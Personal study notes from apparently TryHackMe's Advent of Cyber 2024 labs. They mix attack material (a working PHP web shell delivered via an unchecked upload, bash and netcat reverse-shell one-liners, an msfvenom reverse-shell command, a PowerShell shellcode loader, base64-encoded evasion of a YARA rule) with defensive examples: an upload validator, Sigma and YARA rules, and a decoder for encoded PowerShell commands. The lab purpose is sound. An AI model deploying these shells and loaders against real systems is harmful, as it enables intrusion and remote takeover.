
Advent of Cyber 2024 notes

CVE - RCE and XSS


The RCE exploit (a minimal PHP web shell; the PHP is intentionally unsafe, every value of the command parameter goes straight to system()):

<!-- shell.php -->
<html>
<body>
<!-- The form submits back to this same script via GET, so ?command=... also works from the address bar -->
<form method="GET" action="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="text" name="command" autofocus id="command" size="50">
<input type="submit" value="Execute">
</form>
<pre>
<?php
// Deliberately unsafe: no validation, the raw parameter is executed by the web server's user.
// "2>&1" folds stderr into stdout so error output is shown in the <pre> block as well.
if(isset($_GET['command']))
{
    system($_GET['command'] . ' 2>&1');
}
?>
</pre>
</body>
</html>

RCE is possible through unrestricted file upload: the profile-picture upload accepts shell.php without checking its extension or its content. Once this "profile picture" is uploaded and the profile is updated, the file is stored in the /admin/assets/img/profile/ directory, which is served from the web root, so it can be requested directly at http://<ip-address-or-localhost>/<projectname>/admin/assets/img/profile/shell.php. Appending ?command=id to that URL confirms that the server executes the file rather than serving it as an image.
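The checks that the vulnerable upload handler is missing, as an added example that is not part of the notes or of the target application. It assumes (my assumption, not from the page) that profile pictures are only ever PNG, JPEG or GIF, and that the stored filename is derived from the content hash so the uploader never controls the name or extension on disk:

```python
# Added example: server-side validation for a "profile picture" upload.
# Assumed (not from the page): only PNG/JPEG/GIF are legitimate, and the
# stored name is hash-derived so "shell.php" can never land on disk as such.
import hashlib
import os

# Allowed extension -> magic bytes the file must start with.
ALLOWED_SIGNATURES = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}


def safe_profile_picture_name(filename: str, content: bytes) -> str:
    """Return the name to store the upload under, or raise ValueError.

    Checks, in order:
      1. the final extension is on the allowlist (shell.php is rejected here),
      2. the bytes really start with that image type's signature
         (shell.png containing PHP is rejected here),
      3. no PHP open tag is embedded anywhere in the file, so a polyglot
         "valid PNG + <?php ...>" is rejected even if the web server is
         misconfigured to hand .png files to the PHP handler.
    """
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    if ext not in ALLOWED_SIGNATURES:
        raise ValueError(f"extension not allowed: {ext or '(none)'}")
    if not content.startswith(ALLOWED_SIGNATURES[ext]):
        raise ValueError("content does not match the declared image type")
    if b"<?php" in content or b"<?=" in content:
        raise ValueError("embedded PHP tag in image")
    # The name written to disk is derived from the content, not from the
    # client-supplied filename, so "shell.php.png" becomes <hash>.png.
    digest = hashlib.sha256(content).hexdigest()[:16]
    return f"{digest}{ext}"


def is_accepted(filename: str, content: bytes) -> bool:
    """Convenience wrapper: True if the upload would be stored."""
    try:
        safe_profile_picture_name(filename, content)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed inputs, not real uploads.
    webshell = b"<?php system($_GET['command'] . ' 2>&1'); ?>"
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    print("shell.php     ->", is_accepted("shell.php", webshell))        # False
    print("shell.png     ->", is_accepted("shell.png", webshell))        # False
    print("polyglot png  ->", is_accepted("cat.png", png + webshell))    # False
    print("real png      ->", safe_profile_picture_name("cat.png", png))
```

Checking only the extension, or only the client-supplied Content-Type, leaves the second and third cases open; checking only the magic bytes leaves the polyglot open. The hash-derived name also removes path traversal via the filename.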

information gathering for linux

Command                                                   Use
ls                                                        Lists the files and directories around you
cat                                                       Outputs the contents of a file, such as a text file
pwd                                                       Shows where in the filesystem you are
whoami                                                    Shows which user you are running as
hostname                                                  The system name, which may hint at its role in the network
uname -a                                                  System information: OS, kernel version and more
id                                                        The current user's UID, GID and group memberships
ifconfig                                                  The system's network configuration
bash -i >& /dev/tcp/<attacker-ip>/<port> 0>&1             Starts a reverse shell with bash (the listener is on <attacker-ip>:<port>)
nc -e /bin/sh <attacker-ip> <port>                        Starts a reverse shell with Netcat (requires a netcat build that supports -e)
find / -perm -4000 -type f 2>/dev/null                    Finds SUID (Set User ID) files; a SUID binary runs with the privileges of its owner (often root), which can sometimes be leveraged for privilege escalation
find / -writable -type f 2>/dev/null | grep -v "/proc/"   Finds files the current user can write to (excluding /proc), also useful in privilege escalation attempts

atomic red team - attack emulation

Parameter / explanation / example use:

-AtomicTechnique
    Defines which technique to emulate; use the complete technique name or the "TXXXX" value. The flag name can be omitted (the technique is the first positional argument).
    Example: Invoke-AtomicTest -AtomicTechnique T1566.001

-ShowDetails
    Shows the details of each test included in the Atomic.
    Example: Invoke-AtomicTest T1566.001 -ShowDetails

-ShowDetailsBrief
    Shows the title of each test included in the Atomic.
    Example: Invoke-AtomicTest T1566.001 -ShowDetailsBrief

-CheckPrereqs
    Checks whether all components needed for the tests are present.
    Example: Invoke-AtomicTest T1566.001 -CheckPrereqs

-TestNames
    Selects the tests to execute by their complete Atomic test name.
    Example: Invoke-AtomicTest T1566.001 -TestNames "Download Macro-Enabled Phishing Attachment"

-TestGuids
    Selects the tests to execute by their unique test identifier.
    Example: Invoke-AtomicTest T1566.001 -TestGuids 114ccff9-ae6d-4547-9ead-4cd69f687306

-TestNumbers
    Selects the tests to execute by test number; the numbering is relative to the Atomic technique.
    Example: Invoke-AtomicTest T1566.001 -TestNumbers 2,3

-Cleanup
    Runs the cleanup commands configured for the test to revert the machine to its normal state.
    Example: Invoke-AtomicTest T1566.001 -TestNumbers 2 -Cleanup

Sigma rule for T1566.001, written for the Atomic test that runs the following command (the two statements need a ";" or a line break between them; the notes had run them together):

"powershell.exe" & {$url = 'http://localhost/PhishingAttachment.xlsm'; Invoke-WebRequest -Uri $url -OutFile $env:TEMP\PhishingAttachment.xlsm}

# PowerShell Invoke-WebRequest Sigma Rule
title: Detect PowerShell Invoke-WebRequest and File Creation of PhishingAttachment.xlsm
id: 1
description: Detects the usage of Invoke-WebRequest to download PhishingAttachment.xlsm and the creation of the file PhishingAttachment.xlsm.
status: experimental
author: TryHackMe
logsource:
  category: process_creation
  product: windows
  service: sysmon
detection:
  selection_invoke_webrequest:
    EventID: 1
    CommandLine|contains:
      - 'Invoke-WebRequest'
      - 'http://localhost/PhishingAttachment.xlsm'
  selection_file_creation:
    EventID: 11 # Sysmon Event ID for File Creation
    TargetFilename|endswith: '\PhishingAttachment.xlsm'
  condition: selection_invoke_webrequest or selection_file_creation
falsepositives:
  - Legitimate administration activity may use Invoke-WebRequest, and legitimate Excel files may be created with similar names.
level: high
tags:
  - attack.t1071.001 # Web Service - Application Layer Protocol
  - attack.t1059.001 # PowerShell
  - attack.t1105 # Ingress Tool Transfer
  - attack.t1566.001 # Spearphishing Attachment

Three things to keep in mind before deploying this rule as-is. A list under CommandLine|contains is an OR in Sigma, so selection_invoke_webrequest fires on every command line that merely contains Invoke-WebRequest; CommandLine|contains|all gives the AND that the title implies. The id field should be a UUID rather than 1. And a process_creation logsource only carries Sysmon Event ID 1, so the Event ID 11 selection belongs in a separate rule with category: file_event.
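The rule's two selections evaluated over constructed Sysmon-style events, as an added example (not part of the notes or of the TryHackMe rule), so the OR-versus-AND behaviour of the CommandLine list is visible. Field names follow Sysmon Event ID 1 (CommandLine) and Event ID 11 (TargetFilename); the events, the paths and the benign URL are constructed for the example:

```python
# Added example: a small evaluator for the Sigma selections above, run over
# constructed Sysmon-style events. Only the modifiers the rule needs
# (contains, endswith, all) are implemented.

RULE = {
    "selection_invoke_webrequest": {
        "EventID": 1,
        "CommandLine|contains": [
            "Invoke-WebRequest",
            "http://localhost/PhishingAttachment.xlsm",
        ],
    },
    "selection_file_creation": {
        "EventID": 11,
        "TargetFilename|endswith": "\\PhishingAttachment.xlsm",
    },
}

# Same rule with the AND the title implies: both substrings must be present.
RULE_TIGHTENED = {
    "selection_invoke_webrequest": {
        "EventID": 1,
        "CommandLine|contains|all": RULE["selection_invoke_webrequest"]["CommandLine|contains"],
    },
    "selection_file_creation": RULE["selection_file_creation"],
}


def _field_matches(event, key, expected):
    """Evaluate one Sigma field condition against one event.

    Sigma semantics reproduced here: a list of values is OR unless the
    |all modifier is present; |contains and |endswith are case-insensitive;
    a field without modifier is an exact comparison.
    """
    field, *mods = key.split("|")
    actual = event.get(field)
    if actual is None:            # field absent on this event type
        return False
    values = expected if isinstance(expected, list) else [expected]
    combine = all if "all" in mods else any
    actual_l = str(actual).lower()
    if "contains" in mods:
        return combine(str(v).lower() in actual_l for v in values)
    if "endswith" in mods:
        return combine(actual_l.endswith(str(v).lower()) for v in values)
    return combine(actual == v for v in values)


def selections_fired(event, rule=RULE):
    """Names of the selections this event satisfies (fields inside a selection are ANDed)."""
    return {
        name for name, fields in rule.items()
        if all(_field_matches(event, k, v) for k, v in fields.items())
    }


def rule_matches(event, rule=RULE):
    # condition: selection_invoke_webrequest or selection_file_creation
    return bool(selections_fired(event, rule))


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {   # the Atomic test itself: Sysmon EID 1 with the exact download command
        "EventID": 1,
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "CommandLine": "powershell.exe & {$url = 'http://localhost/PhishingAttachment.xlsm'; "
                       "Invoke-WebRequest -Uri $url -OutFile $env:TEMP\\PhishingAttachment.xlsm}",
    },
    {   # the file landing in %TEMP%: Sysmon EID 11 has no CommandLine field
        "EventID": 11,
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "TargetFilename": "C:\\Users\\Admin\\AppData\\Local\\Temp\\PhishingAttachment.xlsm",
    },
    {   # benign admin download: no phishing URL involved
        "EventID": 1,
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "CommandLine": "powershell.exe Invoke-WebRequest -Uri https://updates.example/agent.msi -OutFile agent.msi",
    },
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["EventID"], sorted(selections_fired(ev)), "tightened:", rule_matches(ev, RULE_TIGHTENED))
```

The third event is the one to watch: under the rule as written it fires, because the list under CommandLine|contains is an OR; under RULE_TIGHTENED it does not. The second event shows why the file-creation selection can never see a CommandLine and why it is better expressed in a file_event rule.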

YARA rule - detect registry query for sandbox

rule SANDBOXDETECTED
{
    meta:
        description = "Detects the sandbox by querying the registry key for Program Path"
        author = "TryHackMe"
        date = "2024-10-08"
        version = "1.1"
    strings:
        // \" is an escaped quote in YARA: this matches the reg query form
        // ...\CurrentVersion" /v ProgramFilesDir
        $cmd = "Software\\Microsoft\\Windows\\CurrentVersion\" /v ProgramFilesDir" nocase
    condition:
        $cmd
}

Evasion by encoding - obfuscation

#include <stdio.h>
#include <stdlib.h>

void registryCheck() {
    // Base64 of the UTF-16LE string
    //   Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion" -Name ProgramFilesDir
    // Neither the registry path nor the reg.exe "/v ProgramFilesDir" string from
    // the YARA rule appears in the binary, so a plain string match will not fire.
    const char *encodedCommand = "RwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuACIAIAAtAE4AYQBtAGUAIABQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwBEAGkAcgA=";
    // Prepare the PowerShell execution command (-EncodedCommand decodes it at runtime)
    char command[512];
    snprintf(command, sizeof(command), "powershell -EncodedCommand %s", encodedCommand);
    // Run the command; the decoded command line is still visible to process-creation logging
    int result = system(command);
    // system() returns the child's exit status; 0 only means PowerShell exited cleanly
    if (result == 0) {
        printf("Registry query executed successfully.\n");
    } else {
        fprintf(stderr, "Failed to execute registry query.\n");
    }
}
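Why the YARA rule above misses the encoded variant, and the normalisation a detection needs, as an added example that is not part of the notes or of the TryHackMe material. The base64 blob is the one from the C snippet; the command lines, the regex for the -EncodedCommand flag and the second indicator string (the Get-ItemProperty spelling of the same registry probe) are my additions:

```python
# Added example: decode "powershell -EncodedCommand <b64>" and re-run the
# registry-probe indicators against both the raw and the decoded text.
import base64
import binascii
import re
from typing import Optional

# Base64 from the C snippet above (UTF-16LE PowerShell command).
ENCODED = (
    "RwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEA"
    "cgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuACIA"
    "IAAtAE4AYQBtAGUAIABQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwBEAGkAcgA="
)

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -enc, ...)
# plus the documented -ec alias, so match all of them, longest first.
_FLAGS = {"encodedcommand"[:i] for i in range(1, len("encodedcommand") + 1)} | {"ec"}
_FLAG_RE = re.compile(
    r"(?<!\S)[-/](" + "|".join(sorted(_FLAGS, key=len, reverse=True)) + r")\s+([A-Za-z0-9+/=]+)",
    re.IGNORECASE,
)

# The reg.exe spelling the YARA rule looks for, and the PowerShell spelling
# the encoded variant actually uses (assumed indicator, not from the page).
INDICATORS = [
    'Software\\Microsoft\\Windows\\CurrentVersion" /v ProgramFilesDir',
    'Software\\Microsoft\\Windows\\CurrentVersion" -Name ProgramFilesDir',
]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    m = _FLAG_RE.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(2), validate=True)
        return raw.decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def registry_probe_hits(text: str) -> list:
    """Case-insensitive indicator match, like the YARA 'nocase' string."""
    low = text.lower()
    return [i for i in INDICATORS if i.lower() in low]


def scan_command_line(cmdline: str) -> dict:
    """Indicators found on the raw command line and on its decoded payload."""
    decoded = decode_encoded_command(cmdline)
    return {
        "decoded": decoded,
        "raw_hits": registry_probe_hits(cmdline),
        "decoded_hits": registry_probe_hits(decoded) if decoded else [],
    }


if __name__ == "__main__":
    # Constructed command lines, not captured telemetry.
    plain = 'reg query "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion" /v ProgramFilesDir'
    encoded = "powershell -EncodedCommand " + ENCODED
    for line in (plain, encoded):
        r = scan_command_line(line)
        print(line[:60], "| raw:", len(r["raw_hits"]), "| decoded:", len(r["decoded_hits"]))
        if r["decoded"]:
            print("  decoded ->", r["decoded"])
```

Two layers of evasion are at work in the C snippet: the command is base64/UTF-16 encoded, so the registry path never appears in the binary, and it uses Get-ItemProperty rather than reg query, so even after decoding the exact YARA string does not match. A detection therefore needs both the decoding step and indicators that cover the registry value rather than one tool's syntax.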

FLOSS - to extract obfuscated strings

PS C:\Tools\FLOSS> floss.exe C:\Tools\Malware\MerryChristmas.exe | Out-File C:\tools\malstrings.txt

XML to filter EventRecordID - Windows Event Viewer

<QueryList>
  <Query Id="0" Path="Microsoft-Windows-Sysmon/Operational">
    <Select Path="Microsoft-Windows-Sysmon/Operational">
      *[System[(EventRecordID="INSERT_EVENT_record_ID_HERE")]]
    </Select>
  </Query>
</QueryList>

msfvenom to create shellcode

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.170.182 LPORT=1111 -f powershell

-f powershell emits the payload as a PowerShell [Byte[]] literal, which is what replaces SHELLCODE_PLACEHOLDER in the loader below.

PowerShell script to load shellcode

# Each Add-Type block compiles a small C# wrapper that P/Invokes one kernel32 function.
$VrtAlloc = @"
using System;
using System.Runtime.InteropServices;
public class VrtAlloc{
    [DllImport("kernel32")]
    public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
}
"@
Add-Type $VrtAlloc
$WaitFor= @"
using System;
using System.Runtime.InteropServices;
public class WaitFor{
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
}
"@
Add-Type $WaitFor
$CrtThread= @"
using System;
using System.Runtime.InteropServices;
public class CrtThread{
    [DllImport("kernel32", CharSet=CharSet.Ansi)]
    public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
}
"@
Add-Type $CrtThread
# Paste the msfvenom -f powershell output here
[Byte[]] $buf = SHELLCODE_PLACEHOLDER
# 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE: one RWX region for the shellcode
[IntPtr]$addr = [VrtAlloc]::VirtualAlloc(0, $buf.Length, 0x3000, 0x40)
# Copy the shellcode bytes into the new region
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $addr, $buf.Length)
# Start a thread whose entry point is the shellcode
$thandle = [CrtThread]::CreateThread(0, 0, $addr, 0, 0, 0)
# 0xFFFFFFFF = INFINITE: keep the PowerShell process alive while the reverse shell runs
[WaitFor]::WaitForSingleObject($thandle, [uint32]"0xFFFFFFFF")

The VirtualAlloc(RWX) + Marshal.Copy + CreateThread sequence from PowerShell is a well-known pattern for EDR and Sysmon-based detections, which is why the room pairs it with evasion and detection-engineering exercises.


© 2020-2025 Ucchas Muhury